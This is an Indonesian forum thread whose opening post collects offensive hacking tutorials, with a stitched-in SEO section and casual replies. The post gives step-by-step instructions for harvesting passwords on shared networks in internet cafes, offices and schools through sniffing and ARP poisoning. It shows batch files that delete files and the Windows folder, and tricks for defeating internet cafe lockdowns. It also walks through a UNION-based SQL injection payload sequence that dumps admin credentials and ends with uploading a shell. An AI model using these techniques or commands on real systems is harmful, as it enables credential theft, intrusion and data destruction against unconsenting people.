Indonesian SWF Editor Community
 
HomeRegisterLog in
SELAMAT Datang Di Cmonhackns ===> Mulailah dari yang kecil... karena semua yang besar dulunya juga kecil..

Share | 
 

 HACKING LAN + sniffing

View previous topic View next topic Go down 
AuthorMessage
Dewa Ninjasaga
Warga Lama
Warga Lama


Jumlah posting : 233
Join date : 2011-04-08
Age : 22
Lokasi : CIREBON

PostSubject: HACKING LAN + sniffing   Thu Sep 29, 2011 8:19 pm

============================================================================================

Hacking LAN + Sniffing
Bagaimana hasilnya jika cara ini di gunakan di warned2, or di kantor, or di sekolah, anda bisa panen password and account. Password and account tersebut anda dapatkan dari orang2 yang terhubung ke jaringan internet dan 1 network (LAN)

Cara ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi. Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibutuhkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]



Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini).

=======================================================================
Attack notepad
Notepad ternyata dapat membuat file yang dapat merugikan banyak hal, sehingga banyak orang yang memanfaatkan jalan alternatif ini, baik untuk membuat virus, html, dan lain-lain.

Contoh disini saya akan memberikan trik untuk membuat windows menjadi tersenyum-senyum melihat hasil kinerja dari notepad tersebut.


Coba anda buka notepad terlebih dahulu, lalu ketikan script ini:

DEL /F /Q *

Save dengan nama >>> cybergun.cmd

Apabila file "cybergun.cmd" itu anda buka maka semua file dan folder akan terhapus !!!

Sekarang coba anda ketikan script dibawah ini:

erase C:TEST.txt

Save dengan nama >>> cybergun1.cmd

Apabila file "cybergun1.cmd" itu anda buka maka file TEST.txt di drive c:\ akan terhapus !!!

Dan coba lagi anda ketikan script dibawah ini:

erase C:WINDOWS

Save dengan nama >>> cybergun2.cmd

Apabila file "cybergun2.cmd" itu anda buka maka semua file pada folder windows akan terhapus semua!!!!


=============================================================================
Hacking Warnet
Yang pertama saya meminta maaf untuk para operator warnet, tapi ambil baiknya saja, mungkin anda bisa lebih waspada dan lebih memprotect semua pc-pc dalam warnet tersebut.

Sebelum ke warnet ingatlah jangan lupa membawa flashdisk, dan perhatikan trick-trick dibawah ini, baik dari membuat enable beberapa registry windows sampai me-reset time billing explorer. Smile


1. Men-enablekan registry, run, command prompt, task manager.
Download file ini disini [You must be registered and logged in to see this link.]

Extractlah file tersebut, kemudian klik kanan pada penagkal.inf dan pilih "install"
Apa yang terjadi, silahkan coba sendiri dengan command promptnya Smile

2. Sniffing
Gunakan saja file cain & abel, klik disini [You must be registered and logged in to see this link.] Untuk Mendownload,


3. Dan masih banyak lagi cara lainnya, nanti saya posting lagi cara-cara lainnya (bentrokin IP, cara mengambil bandwitch, etc) Smile

Saran saya untuk operator warnet untuk lebih memprotect semua pc-pc dalam warnet tersebut:)

=======================================================================================
Pertama apa yang perlu di perhatikan agar website atau blog kita menjadi berharga di mata search engine adalah dengan menambah situs kita ke direktori-direktori yang terdapat di internet, menambahkan url (add url) pada situs pencari, menambahkan halaman web kita ke sosial bookmark dan memberikan komentar pada situs orang lain.

Baiklah untuk lebih rincinya kita uraikan satu persatu :

Pertama menambahkan situs kita ke Direktori-direktori yang terdapat di internet Adapun direktori yang biasa di gunakan antara lain :

[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.] RSS Feed
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]

Kedua menambahkan situs anda ke Search engine, saya yakin anda tidak asing lagi dengan search engine, seprti google, yahoo, dsb. Ada banyak sekali search engine yang bisa kita gunakan untuk menambahkan url kita, Agar Lebih Cepat Klik disini [You must be registered and logged in to see this link.]

Ketiga adalah Mendaftarkan atau menambahkan setiap postingan anda ke dalam social bookmark. Situs Social Bookmark biasanya mempunyai page rank yang sudah cukup tinggi dan sangat sering di kunjungi oleh mesin pencari untuk mengupdate pencarian pada search engine tersebut.Langsung Daftarkan disini [You must be registered and logged in to see this link.]

Yang terakhir meningkatkan page rank dengan sedikit sentuhan adalah dengan menambahkan komentar pada postingan blog orang lain yang mempunyai kategori yang mirip dengan kontent blog kita, silakan beri komentar yang tulus sesuai dengan isi dari artikel tersebut dan jangan lupa pada isian “website” tambahkan url dari postingan yang berkaitan dari blog anda. Agar Lebih Cepat Download Softwer nya disini [You must be registered and logged in to see this link.]


Semoga Bermanfaat!!!
=====================================================================================
Cara ini merupakan cara untuk menyusup ke database admin website. Apabila website tersebut mempunyai celah, maka mudahlah untuk menyusup ke database website itu dan kita bisa mendapatkan acount & passwordnya.

Banyak sekali berbagai cara melakukan SQL injection dan Backdoor salah satunya dengan cara ini, perhatikan cara dibawah ini:


Pertama kita tetapkan target terlebih dahulu
Contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'

Apabila muncul pesan error berarti kita dapat menginject website tersebut, tetapi apabila tidak terdapat pesan error carilah website lainnya yang masih memilki celah.

Kemudian
Mencari dan menghitung jumlah table yang ada dalam databasenya
Gunakan perintah : +order+by+

Contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

Sekarang cek secara satu per satu
Contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

Sehingga muncul error atau hilang pesan error
Misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

Berarti yang kita ambil adalah sampai angka 4 menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

Misalkan pada angka 5 muncul error.

Selanjutnya
Untuk mengeluarkan angka berapa yang muncul gunakan perintah union karena tadi error sampai angka 5
Maka:
[site]/news_Event/newsDetail.php?ID=-2+union+select+4--

Ok , yg keluar angka 2
Gunakan perintah version() untuk mengecek versi sql yg dipakai masukan perintah tsb pada angka yg keluar tadi
Contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

Lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


Dan selanjutnya
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

Contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+
from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"

And than
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+
from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.

Contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(co
lumn_name),3,4+from+information_schema.columns+where+table_name
=0x61646d696e--


Kemudian
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Na
me,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang

ket: 0x3a sama dengan : <- titik dua


Terakhir :
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian

Ingin lebih mudah mengerti cara ini, silahkan download tutorialnya di sini [You must be registered and logged in to see this link.]
===================================================================================
Back to top Go down
Dewa Ninjasaga
Warga Lama
Warga Lama


Jumlah posting : 233
Join date : 2011-04-08
Age : 22
Lokasi : CIREBON

PostSubject: Re: HACKING LAN + sniffing   Fri Sep 30, 2011 1:44 pm

wah gak da yg blz postingan ney ....
tak hapus dagh besok klo emang gk pada mau sih ...
Back to top Go down
zhunDha
Sesepuh
Sesepuh


Jumlah posting : 309
Join date : 2011-08-04
Age : 19
Lokasi : Magelang

PostSubject: Re: HACKING LAN + sniffing   Fri Sep 30, 2011 2:51 pm

dapet Dari mana bang bagus nih buat pengetahuan ane, Cendol Terkirim
Back to top Go down
http://www.adib-source.blogspot.com
1stKame
Sesepuh
Sesepuh


Jumlah posting : 459
Join date : 2011-05-11

PostSubject: Re: HACKING LAN + sniffing   Fri Sep 30, 2011 2:54 pm

Dewa Ninjasaga wrote:
wah gak da yg blz postingan ney ....
tak hapus dagh besok klo emang gk pada mau sih ...

coba di ringkas gan threadnya dicari yang penting-penting aja

soalnya panjang banget orang juga bingung bacanya mau mulai dari mana soalnya kalo dari pertama-akhir mata bisa pegel haha
Back to top Go down
zhunDha
Sesepuh
Sesepuh


Jumlah posting : 309
Join date : 2011-08-04
Age : 19
Lokasi : Magelang

PostSubject: Re: HACKING LAN + sniffing   Fri Sep 30, 2011 3:24 pm

1stKame wrote:
Dewa Ninjasaga wrote:
wah gak da yg blz postingan ney ....
tak hapus dagh besok klo emang gk pada mau sih ...

coba di ringkas gan threadnya dicari yang penting-penting aja

soalnya panjang banget orang juga bingung bacanya mau mulai dari mana soalnya kalo dari pertama-akhir mata bisa pegel haha

ya.... Dibuat kayak Sinopsis Gitu .. hehehe Very Happy
Back to top Go down
http://www.adib-source.blogspot.com
agai132
Bupati
Bupati


Jumlah posting : 609
Join date : 2011-01-27
Age : 101
Lokasi : Depadn Monitor

PostSubject: Re: HACKING LAN + sniffing   Sat Oct 01, 2011 12:24 pm

bagus gan ane sampe pusing baca nya gan wkakwakwkkw nice share gan

_________________
Read This Before Posting


[You must be registered and logged in to see this image.]


[center]cheat PB Terupdate

Cara buat PP kayak saya klik ini sini sini sini [You must be registered and logged in to see this image.]

Follow My blog For Updates Cheat , , , Klik Here


Joki NS terpercaya
Back to top Go down
Dewa Ninjasaga
Warga Lama
Warga Lama


Jumlah posting : 233
Join date : 2011-04-08
Age : 22
Lokasi : CIREBON

PostSubject: Re: HACKING LAN + sniffing   Sun Oct 02, 2011 12:45 pm

zhunDha wrote:
dapet Dari mana bang bagus nih buat pengetahuan ane, Cendol Terkirim


cendol dgah send back sob ..
makasih ...


agai132 wrote:
bagus gan ane sampe pusing baca nya gan wkakwakwkkw nice share gan


hahahaha7x ...
santai jah sob ... yg pntg mah pusing dagh baca na .... hahaha7x

1stKame wrote: wrote:

Dewa Ninjasaga wrote:
wah gak da yg blz postingan ney ....
tak hapus dagh besok klo emang gk pada mau sih ...


coba di ringkas gan threadnya dicari yang penting-penting aja

soalnya panjang banget orang juga bingung bacanya mau mulai dari mana soalnya kalo dari pertama-akhir mata bisa pegel haha


ya.... Dibuat kayak Sinopsis Gitu .. hehehe Very Happy"


ydah ntar aku edit lagi bias jelas ...


Last edited by Dewa Ninjasaga on Sun Oct 02, 2011 1:07 pm; edited 2 times in total
Back to top Go down
Crusher
Moderator
Moderator


Jumlah posting : 1158
Join date : 2011-04-26
Age : 103
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: HACKING LAN + sniffing   Sun Oct 02, 2011 1:00 pm

dari softwarenya aja mencurigakan wkwkwkwk..

_________________
Gw tahu lo maho [You must be registered and logged in to see this image.]

yang sabar ya gan [You must be registered and logged in to see this image.]

jika belum sembuh silahkan Hubungi Operator Axis [You must be registered and logged in to see this image.]

Iklan ini di persembahkan oleh :

[You must be registered and logged in to see this image.]
Back to top Go down
Dewa Ninjasaga
Warga Lama
Warga Lama


Jumlah posting : 233
Join date : 2011-04-08
Age : 22
Lokasi : CIREBON

PostSubject: Re: HACKING LAN + sniffing   Sun Oct 02, 2011 1:04 pm

Kurohige wrote:
dari softwarenya aja mencurigakan wkwkwkwk..


MENCURIGANAKN GMNA SOB ....
Back to top Go down
zhunDha
Sesepuh
Sesepuh


Jumlah posting : 309
Join date : 2011-08-04
Age : 19
Lokasi : Magelang

PostSubject: Re: HACKING LAN + sniffing   Sun Oct 02, 2011 1:09 pm

Dewa Ninjasaga wrote:
Kurohige wrote:
dari softwarenya aja mencurigakan wkwkwkwk..


MENCURIGANAKN GMNA SOB ....

kayaknya, maksudnya Softwarenya keylogger Itu gan yang mencurigakan
Back to top Go down
http://www.adib-source.blogspot.com
Dewa Ninjasaga
Warga Lama
Warga Lama


Jumlah posting : 233
Join date : 2011-04-08
Age : 22
Lokasi : CIREBON

PostSubject: Re: HACKING LAN + sniffing   Sun Oct 02, 2011 1:14 pm

zhunDha wrote:
Dewa Ninjasaga wrote:



MENCURIGANAKN GMNA SOB ....

kayaknya, maksudnya Softwarenya keylogger Itu gan yang mencurigakan


owh ... santai jah sob ...
klo mencurigakan gk akan saya share .... santai jah
Back to top Go down
Sponsored content




PostSubject: Re: HACKING LAN + sniffing   Today at 9:23 am

Back to top Go down
 
HACKING LAN + sniffing
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Anyone else have this problem?

Permissions in this forum:You cannot reply to topics in this forum
cmonhackns.n-stars.org :: Off Topic :: Chit - Chat-
Jump to: